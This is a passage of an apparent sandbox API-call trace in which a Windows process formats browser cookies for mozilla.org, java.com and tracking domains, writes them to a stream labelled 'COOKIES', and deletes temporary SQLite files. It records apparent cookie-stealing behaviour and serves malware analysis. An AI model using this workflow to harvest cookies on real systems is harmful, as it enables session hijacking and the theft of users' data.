lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n.oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\n") returned=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n.oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\n" [0160.808] VirtualQuery (in: lpAddress=0x924fb0, lpBuffer=0x2df6ec, dwLength=0x1c | out: lpBuffer=0x2df6ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.808] GetProcessHeap () returned 0x8e0000 [0160.808] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924fb0 | out: hHeap=0x8e0000) returned 1 [0160.808] _aulldvrm () returned 0x0 [0160.808] lstrlenA (lpString="prefmgr-cookie.truste-svc.net") returned 29 [0160.808] lstrlenA (lpString="cookie_3rdparty") returned 15 [0160.808] GetProcessHeap () returned 0x8e0000 [0160.809] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x924fb0 [0160.809] GetProcessHeap () returned 0x8e0000 [0160.809] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x9265b8 [0160.809] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df700 | out: lpSystemTimeAsFileTime=0x2df700*(dwLowDateTime=0xe31fdb50, dwHighDateTime=0x1d59514)) [0160.809] wsprintfA (in: param_1=0x9265b8, param_2="%li" | out: param_1="1604651427") returned 10 [0160.809] wsprintfA (in: param_1=0x924fb0, param_2="%s\x09TRUE\x09%s\x09%s\x09%s\x09%s\x09%s\n" | out: param_1="prefmgr-cookie.truste-svc.net\x09TRUE\x09/\x09FALSE\x091604651427\x09cookie_3rdparty\x09enabled\n") returned 78 [0160.809] lstrlenA (lpString=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n.oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\n") returned 534 [0160.809] GetProcessHeap () returned 0x8e0000 [0160.809] RtlReAllocateHeap (Heap=0x8e0000, Flags=0x8, Ptr=0x9262f0, Size=0x4ae) returned 0x926628 [0160.809] lstrcatA (in: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n.oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\n", lpString2="prefmgr-cookie.truste-svc.net\x09TRUE\x09/\x09FALSE\x091604651427\x09cookie_3rdparty\x09enabled\n" | out: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n.oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\nprefmgr-cookie.truste-svc.net\x09TRUE\x09/\x09FALSE\x091604651427\x09cookie_3rdparty\x09enabled\n") returned=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n.oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\nprefmgr-cookie.truste-svc.net\x09TRUE\x09/\x09FALSE\x091604651427\x09cookie_3rdparty\x09enabled\n" [0160.809] VirtualQuery (in: lpAddress=0x924fb0, lpBuffer=0x2df6ec, dwLength=0x1c | out: lpBuffer=0x2df6ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.809] GetProcessHeap () returned 0x8e0000 [0160.809] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924fb0 | out: hHeap=0x8e0000) returned 1 [0160.809] _aulldvrm () returned 0x0 [0160.809] lstrlenA (lpString="consent-pref.truste.com") returned 23 [0160.809] lstrlenA (lpString="token_test") returned 10 [0160.809] GetProcessHeap () returned 0x8e0000 [0160.809] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x924fb0 [0160.809] GetProcessHeap () returned 0x8e0000 [0160.809] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x9262f0 [0160.809] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df700 | out: lpSystemTimeAsFileTime=0x2df700*(dwLowDateTime=0xe31fdb50, dwHighDateTime=0x1d59514)) [0160.809] wsprintfA (in: param_1=0x9262f0, param_2="%li" | out: param_1="1604651427") returned 10 [0160.809] wsprintfA (in: param_1=0x924fb0, param_2="%s\x09TRUE\x09%s\x09%s\x09%s\x09%s\x09%s\n" | out: param_1="consent-pref.truste.com\x09TRUE\x09/\x09FALSE\x091604651427\x09token_test\x09Fri Jun 16 2017 08:34:12 GMT+1000 (AUS Eastern Standard Time)\n") returned 121 [0160.809] lstrlenA (lpString=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n.oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\nprefmgr-cookie.truste-svc.net\x09TRUE\x09/\x09FALSE\x091604651427\x09cookie_3rdparty\x09enabled\n") returned 612 [0160.809] lstrcatA (in: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n.oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\nprefmgr-cookie.truste-svc.net\x09TRUE\x09/\x09FALSE\x091604651427\x09cookie_3rdparty\x09enabled\n", lpString2="consent-pref.truste.com\x09TRUE\x09/\x09FALSE\x091604651427\x09token_test\x09Fri Jun 16 2017 08:34:12 GMT+1000 (AUS Eastern Standard Time)\n" | out: lpString1=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n.oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\nprefmgr-cookie.truste-svc.net\x09TRUE\x09/\x09FALSE\x091604651427\x09cookie_3rdparty\x09enabled\nconsent-pref.truste.com\x09TRUE\x09/\x09FALSE\x091604651427\x09token_test\x09Fri Jun 16 2017 08:34:12 GMT+1000 (AUS Eastern Standard Time)\n") returned=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n.oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\nprefmgr-cookie.truste-svc.net\x09TRUE\x09/\x09FALSE\x091604651427\x09cookie_3rdparty\x09enabled\nconsent-pref.truste.com\x09TRUE\x09/\x09FALSE\x091604651427\x09token_test\x09Fri Jun 16 2017 08:34:12 GMT+1000 (AUS Eastern Standard Time)\n" [0160.809] VirtualQuery (in: lpAddress=0x924fb0, lpBuffer=0x2df6ec, dwLength=0x1c | out: lpBuffer=0x2df6ec*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.809] GetProcessHeap () returned 0x8e0000 [0160.809] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924fb0 | out: hHeap=0x8e0000) returned 1 [0160.810] UnlockFileEx (in: hFile=0x164, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2df344 | out: lpOverlapped=0x2df344) returned 1 [0160.810] lstrlenA (lpString=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n.oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\nprefmgr-cookie.truste-svc.net\x09TRUE\x09/\x09FALSE\x091604651427\x09cookie_3rdparty\x09enabled\nconsent-pref.truste.com\x09TRUE\x09/\x09FALSE\x091604651427\x09token_test\x09Fri Jun 16 2017 08:34:12 GMT+1000 (AUS Eastern Standard Time)\n") returned 733 [0160.810] lstrlenA (lpString="COOKIES") returned 7 [0160.810] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2df6f4*=0x7, cb=0x4, pcbWritten=0x2df6ec | out: pcbWritten=0x2df6ec*=0x4) returned 0x0 [0160.810] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0xc5830*=0x43, cb=0x7, pcbWritten=0x2df6f4 | out: pcbWritten=0x2df6f4*=0x7) returned 0x0 [0160.810] lstrlenA (lpString="COOKIES") returned 7 [0160.810] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2df6f4*=0x7, cb=0x4, pcbWritten=0x2df6ec | out: pcbWritten=0x2df6ec*=0x4) returned 0x0 [0160.810] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0xc5830*=0x43, cb=0x7, pcbWritten=0x2df6f4 | out: pcbWritten=0x2df6f4*=0x7) returned 0x0 [0160.810] lstrlenA (lpString=".mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_ga\x09GA1.2.267706369.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gid\x09GA1.2.652256341.1496630270\n.mozilla.org\x09TRUE\x09/\x09FALSE\x091604651427\x09_gat_UA-36116321-1\x091\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09s_nr\x091497566050616\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpName\x09javac%3AVerify%3AInstalled_JRE_Homepage\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpChannel\x09javac%3AVerify\n.java.com\x09TRUE\x09/\x09FALSE\x091604651427\x09gpServer\x09java.com\n.oracle.112.2o7.net\x09TRUE\x09/\x09FALSE\x091604651427\x09s_vi\x09[CS]v1|2CA1CC02050323A4-4000119A80008B49[CE]\nprefmgr-cookie.truste-svc.net\x09TRUE\x09/\x09FALSE\x091604651427\x09cookie_3rdparty\x09enabled\nconsent-pref.truste.com\x09TRUE\x09/\x09FALSE\x091604651427\x09token_test\x09Fri Jun 16 2017 08:34:12 GMT+1000 (AUS Eastern Standard Time)\n") returned 733 [0160.810] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2df6f4*=0xdd, cb=0x4, pcbWritten=0x2df6ec | out: pcbWritten=0x2df6ec*=0x4) returned 0x0 [0160.810] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x926628*=0x2e, cb=0x2dd, pcbWritten=0x2df6f4 | out: pcbWritten=0x2df6f4*=0x2dd) returned 0x0 [0160.810] VirtualQuery (in: lpAddress=0x926628, lpBuffer=0x2df6ec, dwLength=0x1c | out: lpBuffer=0x2df6ec*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.810] GetProcessHeap () returned 0x8e0000 [0160.810] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926628 | out: hHeap=0x8e0000) returned 1 [0160.810] LockFileEx (in: hFile=0x160, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2df650 | out: lpOverlapped=0x2df650) returned 1 [0160.810] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2df648 | out: lpOverlapped=0x2df648) returned 1 [0160.810] LockFileEx (in: hFile=0x160, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2df650 | out: lpOverlapped=0x2df650) returned 1 [0160.810] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a3f8) returned 0x10 [0160.810] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a3f8 | out: hHeap=0x2dc0000) returned 1 [0160.810] UnmapViewOfFile (lpBaseAddress=0x270000) returned 1 [0160.810] CloseHandle (hObject=0x168) returned 1 [0160.810] CloseHandle (hObject=0x164) returned 1 [0160.812] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a480, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0160.812] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x392afc0 [0160.812] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392afc0) returned 0x64 [0160.812] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a480, cbMultiByte=-1, lpWideCharStr=0x392afc0, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-shm") returned 50 [0160.812] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-shm" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp-shm")) returned 0x2020 [0160.812] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-shm" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp-shm")) returned 1 [0160.814] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392afc0) returned 0x64 [0160.814] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392afc0 | out: hHeap=0x2dc0000) returned 1 [0160.814] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a4c8) returned 0x8 [0160.814] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a4c8 | out: hHeap=0x2dc0000) returned 1 [0160.814] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a410) returned 0xae [0160.814] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a410 | out: hHeap=0x2dc0000) returned 1 [0160.814] CloseHandle (hObject=0x154) returned 1 [0160.817] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a725, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0160.817] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x395b8c8 [0160.817] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0160.817] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a725, cbMultiByte=-1, lpWideCharStr=0x395b8c8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-wal") returned 50 [0160.818] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp-wal")) returned 0x2020 [0160.818] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\646D.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\646d.tmp-wal")) returned 1 [0160.818] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0160.818] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0160.818] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39298b0) returned 0x4 [0160.818] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39298b0 | out: hHeap=0x2dc0000) returned 1 [0160.818] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a330) returned 0xc0 [0160.818] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a330 | out: hHeap=0x2dc0000) returned 1 [0160.818] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2df654 | out: lpOverlapped=0x2df654) returned 1 [0160.818] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2df654 | out: lpOverlapped=0x2df654) returned 0 [0160.818] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2df648 | out: lpOverlapped=0x2df648) returned 0 [0160.818] GetLastError () returned 0x9e [0160.818] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2df654 | out: lpOverlapped=0x2df654) returned 1 [0160.818] CloseHandle (hObject=0x160) returned 1 [0160.818] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b770) returned 0x8000 [0160.818] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b770) returned 0x8000 [0160.818] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392b770 | out: hHeap=0x2dc0000) returned 1 [0160.818] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x7e0020) returned 0xa0c80 [0160.818] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x7e0020 | out: hHeap=0x2dc0000) returned 1 [0160.819] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3933778) returned 0x400 [0160.819] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3933778 | out: hHeap=0x2dc0000) returned 1 [0160.819] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a130) returned 0x74 [0160.819] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a130 | out: hHeap=0x2dc0000) returned 1 [0160.819] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a4d8) returned 0x281 [0160.819] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a4d8 | out: hHeap=0x2dc0000) returned 1 [0160.819] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a828) returned 0x10 [0160.819] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a828 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7c8) returned 0x10 [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a7c8 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b0d8) returned 0x77 [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392b0d8 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392b038) returned 0x97 [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392b038 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d18) returned 0xb [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929d18 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929db8) returned 0x10 [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929db8 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929dd0) returned 0xe [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929dd0 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e30) returned 0x30 [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929e30 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929de8) returned 0x19 [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929de8 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ea0) returned 0x30 [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ea0 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e10) returned 0xa [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929e10 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929e68) returned 0xb [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929e68 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a780) returned 0xa [0160.820] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a780 | out: hHeap=0x2dc0000) returned 1 [0160.820] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a798) returned 0xa [0160.820] HeapFree 